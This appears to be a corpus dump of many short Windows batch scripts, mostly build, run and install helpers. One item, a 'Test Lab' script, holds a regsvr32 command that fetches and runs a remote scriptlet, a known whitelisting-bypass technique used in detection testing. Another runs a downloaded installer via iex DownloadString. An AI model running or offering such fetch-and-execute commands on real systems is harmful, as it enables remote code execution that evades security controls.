source
string
code_lang
string
content
string
idx
int64
the-stack-v2-dedup
Batchfile
:: AdventureENGINE :: Version 0.1 :: Starting... @echo off title AdventureENGINE Base Engine [alpha] :title cls type title.txt echo >_ set /p title= if %title%=="new game" goto :gamest if %title%=="new" goto :gamest if %title%=="newgame" goto :gamest if %title%=="start game" goto :gamest if %title%=="start" goto :games...
700
the-stack-v2-dedup
Batchfile
mvn install:install-file -Dfile=msgframe-common-1.7.3.jar -DgroupId=com.ai.aif.msgframe -DartifactId=msgframe-common -Dversion=1.7.3 -Dpackaging=jar mvn install:install-file -Dfile=msgframe-consumer-1.7.3.jar -DgroupId=com.ai.aif.msgframe -DartifactId=msgframe-consumer -Dversion=1.7.3 -Dpackaging=jar mvn install:insta...
701
the-stack-v2-dedup
Batchfile
@echo OFF SET IMAGE_SIZE=224 SET ARCHITECTURE="mobilenet_1.0_%IMAGE_SIZE%" python -m scripts.retrain --bottleneck_dir=tf_files\\bottlenecks ^ --how_many_training_steps=10000 ^ --learning_rate=0.001 ^ --model_dir=tf_files\\models/"%ARCHITECTURE%" ^ --summaries_dir=tf_files\\training_summaries/"%ARCHITECTURE%" ^ --outpu...
702
the-stack-v2-dedup
Batchfile
k: cd K:\JAVA_WORKSPACE\eBanking mvn clean install
703
the-stack-v2-dedup
Batchfile
k: cd K:\Development\Node.JS node "K:\Development\Node.JS\EscapeGame\escape.js" explorer "http://192.168.1.227:8080"
704
the-stack-v2-dedup
Batchfile
@echo off IF NOT EXIST ..\build mkdir ..\build pushd ..\build glslangValidator -V ..\code\viewer.vert -o viewer_vert.spv glslangValidator -V ..\code\viewer.frag -o viewer_frag.spv glslangValidator -V ..\code\overlay.vert -o overlay_vert.spv glslangValidator -V ..\code\overlay.frag -o overlay_frag.spv set vulkanIncl...
705
the-stack-v2-dedup
Batchfile
echo Power Off! > C:\users\zeb\status.txt
706
the-stack-v2-dedup
Batchfile
net stop pinganpay sc delete pinganpay @pause
707
the-stack-v2-dedup
Batchfile
set PATH=%PATH%;C:\devkitPro\devkitARM\bin;C:\devkitPro\msys\bin build.py pause
708
the-stack-v2-dedup
Batchfile
:: Remove the OneDrive 32bits Folder From File Explorer by Editing the Registry (System.IsPinnedToNameSpaceTree ) reg query "HKEY_CLASSES_ROOT\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" /v {018D5C66-4533-4307-9B53-224DE2ED1FE6} if not errorlevel 1 ( reg delete "HKEY_CLASSES_ROOT\CLSID\{018D5C66-4533-4307-9B53-...
709
the-stack-v2-dedup
Batchfile
@g++ -o test.exe src/.cpp -std=c++11 -DRAMSEY_DEBUG
710
the-stack-v2-dedup
Batchfile
REM ############################################################################# REM # # REM # TPM2 regression test # REM # Written by Ken Goldman # REM # IBM Thomas J. Watson Research Center # REM # # REM # (c) Copyright IBM Corporation 2015 - 2020 # REM # # R...
711
the-stack-v2-dedup
Batchfile
@echo off ECHO %* SET PACKAGE=%1 SHIFT SET PYTHON=%1 SHIFT SET REVISION=%1 SHIFT :: ECHO %* %REVISION% %PYTHON% %PACKAGE% conda build %PACKAGE%/build-%REVISION% --python=%PYTHON%
712
the-stack-v2-dedup
Batchfile
@echo off :loop ffmpeg -y -hide_banner -i %1 -vf scale=iw/2:ih/2 -c copy -c:v libx264 -preset veryfast -crf 2 "%~n1.scale_half%~x1" if %ERRORLEVEL% GEQ 1 pause shift if "%~1" neq "" goto loop
713
the-stack-v2-dedup
Batchfile
@echo off set MAKEFILE=makefile_verc0 call "%~dp0..\..\tools\vc.build.set.x32.bat" set WIDE=1 set IA64= set AMD64= nmake /A /B /F %MAKEFILE% FAR_UNICODE=4245 call "%~dp0..\..\tools\vc.build.set.x64.bat" set AMD64=1 nmake /A /B /F %MAKEFILE% FAR_UNICODE=4245
714
the-stack-v2-dedup
Batchfile
TabularMetadata.exe -i "Files\model.bim" -c "Files\changes.csv" -o "Files\model2.bim"
715
the-stack-v2-dedup
Batchfile
call \\vnhocapfs101\OTHERS\RemoteAssistant\Search_notassigned.bat VNHOC1N0032 22 call \\vnhocapfs101\OTHERS\RemoteAssistant\Search_response.bat VNHOC1N0032 22 call \\vnhocapfs101\OTHERS\RemoteAssistant\Search_response2.bat VNHOC1N0032 22 call \\vnhocapfs101\OTHERS\RemoteAssistant\Search_status.bat VNHOC1N0032 22 ca...
716
the-stack-v2-dedup
Batchfile
@"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))" && SET "PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin" choco install nssm -y md c:\Software\JavaGur...
717
the-stack-v2-dedup
Batchfile
@echo off java -cp ..\dist\pixie.jar org.pixielib.xml.XMLFilesTransformer %1 %2 %3
718
the-stack-v2-dedup
Batchfile
@echo off D: cd D:\project\workSpace\auto-web mvn test @pause
719
the-stack-v2-dedup
Batchfile
echo delpoy heroku git push heroku master pause
720
the-stack-v2-dedup
Batchfile
@echo off rem alternative way to create DADVAPI.DLL rem uses JWasm, MS lib and MS link del RELEASE\*.obj jwasm.exe -coff -nologo -Sg -D_ADVAPI32_=1 -I..\..\Include -D?FLAT=1 -Fl=RELEASE\ -Fo=RELEASE\ *.asm cd RELEASE lib /NOLOGO *.obj /OUT:DADVAPIS.LIB lib /NOLOGO DADVAPIS.LIB /REMOVE:DADVAPI.OBJ /OUT:DADVAPIS.L...
721
the-stack-v2-dedup
Batchfile
start crawler.bat "testNewProxys();" start crawler.bat "testNewProxys();" start crawler.bat "testNewProxys();" start crawler.bat "testNewProxys();" start crawler.bat "testNewProxys();" start crawler.bat "testNewProxys();" start crawler.bat "testNewProxys();" start crawler.bat "testNewProxys();"
722
the-stack-v2-dedup
Batchfile
protoc --proto_path=src/ --go_out=src/ --go-grpc_out=src/ --grpc-gateway_out=src/ src/proto/calculator.proto
723
the-stack-v2-dedup
Batchfile
mkdir .phalcon mkdir cache mkdir tmp mkdir tmp\logs mkdir tmp\upload_images mkdir tmp\filelock
724
the-stack-v2-dedup
Batchfile
@echo OFF create_po_files.exe "..\src" "..\locale_catalog" "demon" cd ..\locale_catalog if NOT EXIST .\pt_BR\LC_MESSAGES ( mkdir .\pt_BR\LC_MESSAGES echo f | xcopy /f /y demon.pot .\pt_BR\LC_MESSAGES\demon.po cd pt_BR\LC_MESSAGES call demon.po echo f | xcopy /f /y demon.mo ..\..\..\locale\pt_BR\LC_...
725
the-stack-v2-dedup
Batchfile
@echo off if .%1 == . goto USAGE if exist %2\lib\cl.lib goto BEGIN if exist %TC%\lib\cl.lib %0 %1 %TC% if exist %R2K%\lib\cl.lib %0 %1 %R2K% echo. echo ERROR: Turbo C library not found. goto USAGE~ :BEGIN ..\refal test%1 (ns) %2\tlink ..\rfdbg test%1 %2\LIB\c0l,test%1,NUL,..\reflib ..\rfdbg %2\LIB\cl te...
726
the-stack-v2-dedup
Batchfile
@echo off call build.bat adb push libs/armeabi-v7a/neon_test /data/local/tmp/ adb shell chmod 777 /data/local/tmp/neon_test adb shell /data/local/tmp/neon_test pause
727
the-stack-v2-dedup
Batchfile
@echo off set FLASK_APP=app.py set FLASK_DEBUG=0 flask run pause
728
the-stack-v2-dedup
Batchfile
@echo on xcopy /s /y bin\* "%LIBRARY_BIN%" || exit 1
729
the-stack-v2-dedup
Batchfile
cl -AL -c -G2 -DOS2 -DMSC %1.c os2prol.lib 
730
the-stack-v2-dedup
Batchfile
@echo off set xv_path=C:\\Xilinx\\Vivado\\2016.3\\bin call %xv_path%/xsim dct_tb_time_synth -key {Post-Synthesis:sim_1:Timing:dct_tb} -tclbatch dct_tb.tcl -view C:/JPEG_Thesis/DCT/dct_tb_time_synth.wcfg -log simulate.log if "%errorlevel%"=="0" goto SUCCESS if "%errorlevel%"=="1" goto END :END exit 1 :SUCCESS exit 0
731
the-stack-v2-dedup
Batchfile
echo Disable loggers :: C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\ If you can see AutoLogger-Diagtrack-Listener.etl in there, :: # then Microsoft has ignored your wishes to opt out of the CEIP (assuming you did) and continues to monitor everything you do on the machine. :: #The registry key which controls...
732
the-stack-v2-dedup
Batchfile
# Test of truncated strings option fail 0 option malloc 0 new ih aardvark_bear_dolphin_gerbil_jaguar 5 it meerkat_panda_squirrel_vulture_wolf 5 rh aardvark_bear_dolphin_gerbil_jaguar reverse rh meerkat_panda_squirrel_vulture_wolf option length 30 rh meerkat_panda_squirrel_vulture reverse option length 28 rh aardvark_be...
733
the-stack-v2-dedup
Batchfile
@echo off rem rem 2-create-venv-installer.bat rem rem TODO smalers 2023-07-16 THIS IS A HACKED-TOGETHER SCRIPT TO BUILD A DEPLOYABLE VENV. rem More work is needed to turn it into a general tool to build the Windows CDSS Tools venv. rem rem Create the Python virtualenv (venv) installer for CDSS SNODAS Tools: rem - this ...
734
the-stack-v2-dedup
Batchfile
echo off "C:\Program Files\Ypsilon\Ypsilon.exe" --acc=%TEMP% -- bench/run-ypsilon.scm pause
735
the-stack-v2-dedup
Batchfile
python -m pip install --upgrade pip python install_flika.py flika_post_install flika
736
the-stack-v2-dedup
Batchfile
@ECHO off SET TITLE=TravelSales CLS TITLE Travel Sales java -version java -Xmx256m -Xverify:none -javaagent:target\dependency\chrl-callbacks-0.0.1-SNAPSHOT.jar -classpath target\travelsales-0.0.1-SNAPSHOT.jar;target\dependency\* at.tug.oad.travelsales.TravelSales
737
the-stack-v2-dedup
Batchfile
ConsoleAliquot.exe -showadb pause
738
the-stack-v2-dedup
Batchfile
C:\Altera\altera_lite\modelsim_ase\win32aloem\modelsim.exe
739
the-stack-v2-dedup
Batchfile
cscript retrieve_excel.vbs c:\temp //nologo
740
the-stack-v2-dedup
Batchfile
IF [%CURRENT_OTP%] == [] exit /b 1 IF [%CURRENT_NAME%] == [] exit /b 1 ag --nocolor -0 -l %CURRENT_OTP% | xargs -0 sed -i '' -e "s/%CURRENT_OTP%/%NEW_OTP%/g" ag --nocolor -0 -l %CURRENT_NAME% | xargs -0 sed -i '' -e "s/%CURRENT_NAME%/%NEW_NAME%/g" mv lib/%CURRENT_OTP% lib/%NEW_OTP% mv lib/%CURRENT_OTP%.ex lib/%NEW_O...
741
the-stack-v2-dedup
Batchfile
@echo off set main=./examples/container-lite/add-to-container.js cd .. cd .. npm run watch
742
the-stack-v2-dedup
Batchfile
@if not defined _echo @echo off setlocal if not defined BuildConfiguration SET BuildConfiguration=Debug SET CMDHOME=%~dp0 @REM Remove trailing backslash \ set CMDHOME=%CMDHOME:~0,-1% pushd "%CMDHOME%" @cd SET TestResultDir=%CMDHOME%\Binaries\%BuildConfiguration%\TestResults if not exist %TestResultDir% md %TestRes...
743
the-stack-v2-dedup
Batchfile
#used to run a list of commands using a set number of processorss on a single node threads=10 cat commands.txt | xargs -I CMD --max-proc=$threads bash -c CMD
744
the-stack-v2-dedup
Batchfile
node tests\ClayTest.js node tests\RClayTest.js node tests\ConduitTest.js node tests\VClayTest.js node tests\BlockClayTest.js node tests\NBTests\ConduitSimpleTest.js node tests\NBTests\RClayTest.js node tests\NBTests\Path1Test.js
745
the-stack-v2-dedup
Batchfile
@ECHO OFF rem ATTRIB -R "..\..\..\..\extensions\rhoelementsext\public\elements.js" rem del ..\..\..\..\extensions\rhoelementsext\public\elements.js javac JSGen.java java JSGen ../../../../neon/EMMLTags/XML/ jsgen.xsl ../../../../extensions/rhoelementsext/public/elements.js if not exist "../../../../extensions/rhoeleme...
746
the-stack-v2-dedup
Batchfile
@echo off title CPU Rename v1.0 By CONSOLEYT7 cd package :cpuname cls set /p cpuname=Type CPU Name To Rename : goto file1 :file1 cls if exist cpu_rename_reg.reg goto file0 if not exist cpu_rename_reg.reg goto file2 :file2 cls echo Windows Registry Editor Version 5.00 >>cpu_rename_reg.reg echo. >>cp...
747
the-stack-v2-dedup
Batchfile
cmd_/home/test/smart_bicycle/smart_bicycle_B/MODULE_PI_B.ko := arm-linux-gnueabi-ld -EL -r -T ./scripts/module-common.lds --build-id -o /home/test/smart_bicycle/smart_bicycle_B/MODULE_PI_B.ko /home/test/smart_bicycle/smart_bicycle_B/MODULE_PI_B.o /home/test/smart_bicycle/smart_bicycle_B/MODULE_PI_B.mod.o ; true
748
the-stack-v2-dedup
Batchfile
python D:\Survey_Data_Analysis_Python\src\config.py python D:\Survey_Data_Analysis_Python\src\CreateTables.py python D:\Survey_Data_Analysis_Python\src\ReadS3AndPopulateDB.py python D:\Survey_Data_Analysis_Python\src\SurveyAnalysis.py
749
the-stack-v2-dedup
Batchfile
@echo off call setsys call settools inc1 if "%1" == "" goto NOLOAD if "%1" == "mt32" goto MT32 if "%1" == "std" goto STD if "%1" == "blast" goto BLAST if "%1" == "mtblast" goto MTBLAST :ERROR echo Usage: "%0 [mt32 std blast mtblast]" echo So next time, type "%0 " and one of th...
750
the-stack-v2-dedup
Batchfile
:: Basic Test Lab One :: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct :: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll :: NOTE it is a BAD idea to execute scripts from a repo tha...
751
the-stack-v2-dedup
Batchfile
cmd_drivers/char/testprocess/built-in.o := rm -f drivers/char/testprocess/built-in.o; ar rcs drivers/char/testprocess/built-in.o
752
the-stack-v2-dedup
Batchfile
set outdir=..\temp\cmake_x64\ cmake . -B %outdir% -G "Visual Studio 15 2017 Win64" IF %ERRORLEVEL% NEQ 0 exit /B 1 pushd %outdir% cmake --build . --config Release IF %ERRORLEVEL% NEQ 0 ( popd exit /B 2 )
753
the-stack-v2-dedup
Batchfile
@echo off cls chcp 1250 >nul setlocal enableextensions setlocal enabledelayedexpansion if EXIST "%~dp0wget.exe" (set wget="%~dp0wget.exe") ELSE (set wget="D:\Programy\Portable\wget\wget.exe") title Ściąganie całych rozdziałów mangi z serwisu Mangatown echo Podaj ścieżkę, do której będą pobierane obrazy: echo (naciś...
754
the-stack-v2-dedup
Batchfile
set rjava=../../test/run.jar java -jar %rjava% testng.xml REM cmd/k
755
the-stack-v2-dedup
Batchfile
@ECHO OFF SET PASSWORD=%1 SET SERVICE_HOST=http://localhost:8888 SET SCOPE=knb-lter-nin SET IDENTIFIER=99999 curl -i -u uid=cjack,o=LTER,dc=ecoinformatics,dc=org:%PASSWORD% -X DELETE %SERVICE_HOST%/package/eml/%SCOPE%/%IDENTIFIER%
756
the-stack-v2-dedup
Batchfile
javac *.java 2>compileOut.txt jar cvfm AutoJudge.jar manifest.txt *.class del *.class
757
the-stack-v2-dedup
Batchfile
:menu @echo off cls echo. echo Press 1 for Miami Vice w/ Game Blaster echo Press 2 for Miami Vice w/ SoundBlaster echo Press 3 for Miami Vice w/ MT-32 echo Press 4 to Quit echo. choice /C:1234 /N Please Choose: if errorlevel = 4 goto quit if errorlevel = 3 goto MT32 if errorlevel = 2 goto SB16 if errorlevel = 1 goto G...
758
the-stack-v2-dedup
Batchfile
copy libalgo.h "E:\Workshop\projects\0044-hdr\zebra\src\zebra-config" copy libalgo.lib "E:\Workshop\projects\0044-hdr\zebra\src\zebra-config" copy libalgo.dll "E:\Workshop\projects\0044-hdr\zebra\src\debug" copy libalgo.dll "E:\Workshop\projects\0044-hdr\zebra\src\release"
759
the-stack-v2-dedup
Batchfile
xcopy D:\dtun_work\pcbms\src\jsp E:\WorkspacesBuild\pcbms /s /y /d /i pause
760
the-stack-v2-dedup
Batchfile
* *** FEFRH1016-1 ! file CONNECT ( KERN TEST ! CREATE TABLE TAB1 ( a001 char (5) key, a002 char (5) key, a003 char (5) key, a004 varchar (5) default '12345', a005 varchar (5) default '12345', a00...
761
the-stack-v2-dedup
Batchfile
@echo off pushd Source call vcvarsall amd64 cl -Zi -EHsc -Od -Fedashboard_win32 dashboard_win32.cpp "../Libs/opencv_world320.lib" "../Libs/opencv_world320d.lib" user32.lib gdi32.lib opengl32.lib ws2_32.lib copy dashboard_win32.exe "../build/dashboard_win32.exe" copy dashboard_win32.pdb "../build/dashboard_win32.pdb" d...
762
the-stack-v2-dedup
Batchfile
:: ************************************************************************* :: Copyright 2009 VMware, Inc. All rights reserved. :: ************************************************************************* :: :: This script is used by Get-VmGuestNetworkAdapter cmdlet to retrieve network adapters available on the...
763
the-stack-v2-dedup
Batchfile
@echo off set BAT_PATH=%~dp0 set PYTHONPATH=%BAT_PATH:~0,-4% python -O -m saam.analyse %*
764
the-stack-v2-dedup
Batchfile
TITLE initialize call install_inject_database.bat ECHO Injected database cd C:\Users\jokin\Desktop\Batch_MofscriptAdaptation start call compare_execute.bat
765
the-stack-v2-dedup
Batchfile
@ECHO OFF echo compiling test.ASM echo DEL test.OBJ 2>NUL echo DEL test.EXE 2>NUL \tasm\bin\tasm32 /la /l /zi /mu /m9 /q ..\test.asm /i.. if ERRORLEVEL == 1 GOTO FAILtest \watcom\binw\wlink @c:\watcom\pmode\pmodew.lnk system pmodew file test.obj if ERRORLEVEL == 1 GOTO FAILtest echo Running test.EXE test.EXE if ERRORLE...
766
the-stack-v2-dedup
Batchfile
@echo off set body="New Upload Files" set s="New Upload Files" set t=#收件邮箱# set f=#发件邮箱# set pw=#smtp密码# set attach=*.* Blat -body %body% -s %s% -attach %attach% -t %t% -server #smtp服务器# -f %f% -u %f% -pw %pw%
767
the-stack-v2-dedup
Batchfile
@echo off cls dotnet build Fleece.sln -c Release if ERRORLEVEL 1 ( echo Error building Fleece exit /b 1 ) dotnet pack src\Fleece.SystemJson -c Release if ERRORLEVEL 1 ( echo Error creating package for Fleece.SystemJson exit /b 1 ) dotnet pack src\Fleece.FSharpData -c Release if ERRORLEVEL 1 ( echo Error creati...
768
the-stack-v2-dedup
Batchfile
java -cp build\libs\all-in-one-jar-1.0-SNAPSHOT.jar -Xms4g com.ajlopez.blockchain.tools.TrieMemoryPerformance 1048576 32 20 --csv > trietest2.txt java -cp build\libs\all-in-one-jar-1.0-SNAPSHOT.jar -Xms4g com.ajlopez.blockchain.tools.TrieMemoryPerformance 2097152 32 20 --csv >> trietest2.txt java -cp build\libs\all-in-...
769
the-stack-v2-dedup
Batchfile
@echo off start CLEAN.bat Accessories\bison -d Viper\Viper.y Accessories\flex Viper\Viper.l g++ lex.yy.cc ren a.exe Token.exe start Accessories\Tokenize.bat %1 g++ Viper.tab.c ren a.exe Interpreter.exe start Accessories\Interpret.bat del lex.yy.cc pause
770
the-stack-v2-dedup
Batchfile
call %bs_path%\cmd\BuildReports4.cmd rsa PLAIN_EXCEL 01-01-2015 02-01-2015
771
the-stack-v2-dedup
Batchfile
java -jar dist/DataGeneration.jar cat dbFull
772
the-stack-v2-dedup
Batchfile
cd .. call mvn clean call mvn clean install -e -Dmaven.test.skip=true @pause
773
the-stack-v2-dedup
Batchfile
-fbx:indoorPlants_01.fbx -outputdir:../CPRT/indoorPlants_01 -overwritematerials:-
774
the-stack-v2-dedup
Batchfile
cd C:\Users\aste2.CEFI\OneDrive\ATI\FW_Int0 del main.hex make echo off del main.d del main.eep del main.elf del main.lss del main.lst del main.map del main.o del main.sym pause
775
the-stack-v2-dedup
Batchfile
echo Building Win32 Help files echo. echo.
776
the-stack-v2-dedup
Batchfile
@echo off setlocal cd server call bin\shutdown.bat cd ..
777
the-stack-v2-dedup
Batchfile
../../../../.git/annex/objects/Vk/mM/MD5E-s13009--613848cc41372c9cf21329d8658b3097.cmd/MD5E-s13009--613848cc41372c9cf21329d8658b3097.cmd
778
the-stack-v2-dedup
Batchfile
forever start ./bin/www
779
the-stack-v2-dedup
Batchfile
MSBuild.exe /v:m /clp:ErrorsOnly Source\Version2.0\Xceed.Wpf.AvalonDock.sln /p:Configuration=Release /t:ReBuild /nologo rmdir Bin\ /S /Q xcopy Source\Version2.0\Xceed.Wpf.AvalonDock\bin\Release Bin\Version2.0\Xceed.Wpf.AvalonDock /E /K /Y /C /R /Q /I xcopy Source\Version2.0\Xceed.Wpf.AvalonDock.Themes.Aero\bin\Releas...
780
the-stack-v2-dedup
Batchfile
java -jar hw_1_base_operations_vasyl_zablotskyi_task1.jar pause
781
the-stack-v2-dedup
Batchfile
"ThirdParty\NAnt\bin\nant.exe" -D:Configuration=Release -D:Platform="x86" -buildfile:NDepth.build Tests "ThirdParty\NAnt\bin\nant.exe" -D:Configuration=Release -D:Platform="x64" -buildfile:NDepth.build Tests
782
the-stack-v2-dedup
Batchfile
setlocal rem set JAVA_HOME=c:\java\jdk1.6.0_18 set LOOKUPGROUPS=moran set JSHOMEDIR=%~dp0\gigaspaces %JSHOMEDIR%\bin\gs-ui.bat endlocal
783
the-stack-v2-dedup
Batchfile
@ECHO OFF SETLOCAL ENABLEDELAYEDEXPANSION IF [%1]==[] ( SET /P "inp=Input: " ) ELSE ( SET "inp=%1" ) IF [%2]==[] ( SET /P "out=Output: " ) ELSE ( SET "out=%2" ) IF NOT EXIST "%inp%" ( ECHO - Unable to find %inp% GOTO :END ) IF EXIST "%inp%\*" ( FOR %%i in ("%inp%\*.pp*") do CSCRIPT ppt2p...
784
the-stack-v2-dedup
Batchfile
@ECHO OFF SET Utils=D:\utils :: WAV to MP3 echo input file: %1, title: %2, artist: %3, album %4, year: %5, genre: %6, track[/total]: %7, [output: %8] %Utils%\Lame\lame.exe -m j -q 0 -V 0 --tt %2 --ta %3 --tl %4 --ty %5 --tg %6 --tn %7 --add-id3v2 %1 %8 ::TODO: add option to delete wav?
785
the-stack-v2-dedup
Batchfile
::program created by Chl6rine:: ::::program load:::: @echo off @cls title Text To Image Merger By Chl6rine color 04 ::::menu:::: cls echo. echo.../text to image merger\... echo. echo this program will hide any text you like into an image. echo To get started. press Enter echo. pause cls ::::create::...
786
the-stack-v2-dedup
Batchfile
 echo ****************************************************************** echo ** Copy TestAssmblies to to output folder to avoid referencing. ** echo ****************************************************************** xcopy /y %1\..\assemblies\TestContrcat\bin\Debug\netstandard1.6\TestContrcat.dll %2 xcopy /y %1...
787
the-stack-v2-dedup
Batchfile
@echo off rem ------------------------------------------------------------------------------------- rem rem USAGE rem tfsget <TFS_SOURCE_PATH> <CHECKOUT_DEST_DIR> rem rem EXAMPLE rem tfsget '$/src/business/v1.0/js' C:/src/business/v1.0/js rem rem --------------------------------------...
788
the-stack-v2-dedup
Batchfile
python "getPoiIds.py" pause;
789
the-stack-v2-dedup
Batchfile
cmd_/root/orangepi-sdk-v3.0/output/kernel/usr/include/asm-h8300/.install := perl scripts/headers_install.pl /root/orangepi-sdk-v3.0/source/linux-3.4.112/arch/h8300/include/asm /root/orangepi-sdk-v3.0/output/kernel/usr/include/asm-h8300 h8300 auxvec.h bitsperlong.h byteorder.h errno.h fcntl.h ioctl.h ioctls.h ipcbuf.h m...
790
the-stack-v2-dedup
Batchfile
@echo off setlocal :: Size is in bytes set min.size=10000 for /f usebackq delims=; %%A in (`dir /b /A:-D *.*`) do If %%~zA LSS %min.size% del %%A
791
the-stack-v2-dedup
Batchfile
run --mode=draft pause
792
the-stack-v2-dedup
Batchfile
@ECHO OFF "C:\Program Files (x86)\Atmel\AVR Tools\AvrAssembler2\avrasm2.exe" -S "D:\AT26\asm\ICAKB_1\labels.tmp" -fI -W+ie -C V2 -o "D:\AT26\asm\ICAKB_1\ICAKB_1.hex" -d "D:\AT26\asm\ICAKB_1\ICAKB_1.obj" -e "D:\AT26\asm\ICAKB_1\ICAKB_1.eep" -m "D:\AT26\asm\ICAKB_1\ICAKB_1.map" "D:\AT26\asm\ICAKB_1\source\main.asm"
793
the-stack-v2-dedup
Batchfile
@ECHO OFF REM Copyright FineBuild Team © 2008 - 2017. Distributed under Ms-Pl License REM CALL "SqlFineBuild.bat" %* /Type:Full /IAcceptLicenseTerms ^ /SAPWD:"UseAL0ngPa55phrase!" /GroupDBA:"GBGGDBAS01" /GroupDBANonSA:"GBGGDBAN01" ^ /SetupSQLDBCluster:YES ...
794
the-stack-v2-dedup
Batchfile
@echo off set UserName=Unknown call :GET_USER_NAME if "%UserName%"=="martynenko" ( rem path to pdm_test.exe is relatively to project that call post_build_event.bat copy ..\bin\debug\pdm_test.exe E:\Common\to_wm\pdm_test.exe ) exit /b rem ####################### :GET_USER_NAME for /f "tokens=1,2,16...
795
the-stack-v2-dedup
Batchfile
@echo off CHCP 65001 color a echo 开始训练比赛模型 Faster R-CNN python train_frcnn.py --path="./data/annotation.txt" --network="vgg" --input_weight_path="./pre_train/vgg16_weights_tf_kernels_notop.h5" rem python train_frcnn.py --path="./train/annotation_1.csv" --network="vgg" Pause rem # 命令行参数 rem parser.add_option("-p", "...
796
the-stack-v2-dedup
Batchfile
ng build --base-href "/angular-cv/" ngh --dir dist/angular-cv
797
the-stack-v2-dedup
Batchfile
@echo off @echo "Uninstalling ReseptBrokerService..." sc stop ReseptBrokerService sc delete ReseptBrokerService
798
the-stack-v2-dedup
Batchfile
%windir%\Microsoft.NET\Framework\v3.5\MSBuild.exe /target:Build /property:Platform="Any CPU" /property:Configuration=Debug
799